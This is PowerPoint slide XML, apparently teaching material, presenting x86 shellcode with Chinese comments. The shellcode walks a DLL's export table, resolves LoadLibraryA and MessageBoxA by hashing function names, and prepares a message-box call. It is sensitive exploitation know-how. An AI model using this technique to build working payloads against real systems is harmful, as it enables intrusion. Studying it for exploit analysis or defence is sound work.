                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, 0x1E380A6A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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MessageBoxA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比较 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRP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jne</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find_functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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如果没有找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MessageBoxA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>函数继续找</a:t>
            </a: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xchg</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eax</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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>//------------------------------------&gt; |</a:t>
            </a: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call[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> - 0x8]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LoadLibraryA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("user32")                  |</a:t>
            </a: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xchg</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eax,ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRP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ebp</a:t>
            </a:r>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userl32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>的基地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MessageBoxA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导出函数名列表指针</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>find_functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>pushad</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保护寄存器</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eax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+ 0x3C]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dll</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PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>头</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ecx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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 0x78]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导出表的指针</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ecx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ecx</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导出表的基地址</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+ 0x20]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导出函数名列表指针</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ebx</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导出函数名列表指针的基地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</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找下一个函数名       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>next_function_loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1499708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B897E17-0513-0FB5-9333-4FB3D55BB184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773943" y="1052452"/>
            <a:ext cx="5111750" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>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esi</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> * 4]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从列表数组中读取</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esi</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esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>函数名称所在地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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cdq</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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = 0</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函数名的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运算  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hash_loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movsx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> al, ah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字符串结尾就跳出当前函数  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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jz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>compare_hash</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ror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, 7</a:t>
            </a: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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,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inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hash_loop</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比较找到的当前函数的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是否是自己想找的 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>compare_hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a: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cmp</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edx</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 0x1C]</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lods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>pushad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>+1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LoadLibraryA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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>next_function_loop</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+ 0x24]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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>顺序表的相对偏移量</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顺序表的基地址</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di, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> + 2 * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</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匹配函数的序号</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+ 0x1C]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地址表的相对偏移量</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地址表的基地址</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ebp</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+ 4 * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</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函数的基地址        </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B018439-62F1-741F-FBBF-1E709E4F9BDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313488" y="1046975"/>
            <a:ext cx="5111750" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;==&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>交换</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>pop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stosd</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把找到的函数保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>的位置</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popad</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cmp</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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, 0x1e380a6a    </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找到最后一个函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MessageBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>后，跳出循环</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>find_lib_functions</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让他做些自己想做的事</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>function_call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>xor</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0x74736577</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
